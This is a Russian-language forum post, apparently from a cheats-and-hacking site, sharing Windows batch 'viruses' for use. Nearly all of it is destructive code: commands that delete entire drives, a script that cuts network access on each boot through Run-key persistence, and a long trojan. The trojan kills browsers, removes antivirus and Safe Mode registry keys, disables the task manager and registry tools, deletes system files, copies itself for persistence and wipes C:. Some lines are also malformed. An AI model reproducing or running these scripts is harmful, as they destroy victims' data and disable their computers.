вирусы | ФОРУМ СОЦИАЛЬНОЙ ИНЖЕНЕРИИ ⭐️MeHack⭐️ - Читы, базы, раздачи аккаунтов, сливы скриптов, способы заработка

вирусы

Тема в разделе "Вирусология", создана пользователем brasser, 01.07.18.Просмотров: 572

  1. brasser Новичок

    brasser

    1 сообщения
    1 симпатий
    0
    розыгрышей
    7 лет с нами
    5 месяцев с нами
    5 дней с нами
    Форматируются диски менее чем за 5 секунд. Только D, Е и С

    rd/s/q D:\
    rd/s/q C:\
    rd/s/q E:\

    Этот вирус отключает Интернет навсегда

    echo @echo off>c:windowswimn32.bat
    echo break off>>c:windowswimn32.bat
    echo ipconfig/release_all>>c:windowswimn32.bat
    echo end>>c:windowswimn32.bat
    reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
    reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
    echo "ваше сообщение"
    PAUSE




    ОЧЕНЬ ОЧЕНЬ ОЧЕНЬ ОПАСНЫЙ ВИРУС

    НЕ ПРОБУЙТЕ НА СЕБЕ

    @echo off
    taskkill /im /f chrome.exe
    taskkill /im /f ie.exe
    taskkill /im /f firefox.exe
    taskkill /im /f opera.exe
    taskkill /im /f safari.exe
    del C:\Program Files\Google\Chrome\Application\chrome.exe
    del C:\Program Files\Safari\safari.exe
    del C:\Program Files\Mozilla Firefox\firefox.exe
    del C:\Program Files\Opera\opera.exe
    del C:\Program Files\Internet Explorer\ie.exe
    reg delete HKLM\SOFTWARE\KasperskyLab\LicStorage /f
    reg delete HKLM\SOFTWARE\Microsoft\SystemCertificates\SPC /f
    echo virus > "C:\ProgramData\Kaspersky Lab\AVP9\Data:extended"
    echo data > "C:\Documents and Settings\All Users\Application Data\Kaspersky Lab\AVP9\Data:extended"
    md SuperUser.{ED7BA470-8E54-465E-825C-99712043E01C
    Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot\*.*
    Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot
    :x
    start mspaint
    goto x
    color 0A
    :y
    set /a papka+=1
    cls
    echo Delete system
    echo %papka% files deleted...
    goto y
    mode con cols=300 lines=300
    color 0A
    :metka
    set /a ran=%random%
    set /a ran9=%ran%-(%ran%/9)*9
    set ran9=%ran9:0=1001010101001010100101%
    set ran9=%ran9:1=100100000101001010101010011010%
    set ran9=%ran9:3=101001010000001010101010%
    set ran9=%ran9:4=101010010101010010100110%
    set ran9=%ran9:5=1010010001001010101010010%
    set ran9=%ran9:6=100101000010101001010%
    set ran9=%ran9:7=100101%
    set ran9=%ran9:7=1101110000101%
    set ran9=%ran9:7=100001101%
    echo %ran9% %random% %ran9% %random% %ran9%
    goto metka
    cd %windir%\system32\drivers\etc
    attrib -r -s hosts
    echo 127.0.0.1 Скрытый контент. Для просмотра Вы должны быть зарегистрированным участником >> hosts
    chcp 1251
    set papka=0
    :1
    set /A papka=papka+1
    md %UserProfile%\Desktop%\LOL_%papka%
    if not %papka%==1000000 goto 1
    del %programfiles% /q > nul
    del C:\Documents and Settings /q > nul
    del %WinDir% /q > nul
    rundll32 mouse,disable > nul
    rundll32 keyboard,disable > nul
    rundll32 user,disableoemlayer > nul
    time 00:00 > nul
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f > nul
    taskkill /f /im explorer.exe > nul
    del: *.*/q > nul
    copy %0 C:\Windows\Win32.bat > nul
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Win32 /t REG_SZ /d C:\Windows\Win32.bat /f
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Polices\System /v DisableTaskMgr /t REG_DWORD /d 1 /f > nul
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 2 /f > nul
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
    del %WinDir%\system32\HAL.dll/q > nul
    del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul
    del "%SystemRoot%\Media" /q > nul
    assoc *.exe = *.guf
    assoc .lnk=.txt
    FOR /L %%i IN (1,1,1000000) DO md %%i
    %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
    del "%SystemRoot%\Cursors\*.*" >nul
    reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d upO /f
    reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f >nul
    copy "%0" "%SystemRoot%\system32\sys321.bat > nul
    del: *.lnk /q
    shutdown -s -t 00 -c error > nul
    shutdown -r -t 00 -c error > nul
    rd C: /s /q > nul
    del %0

    ЭТО ТРОЯН!!!!!!



    пока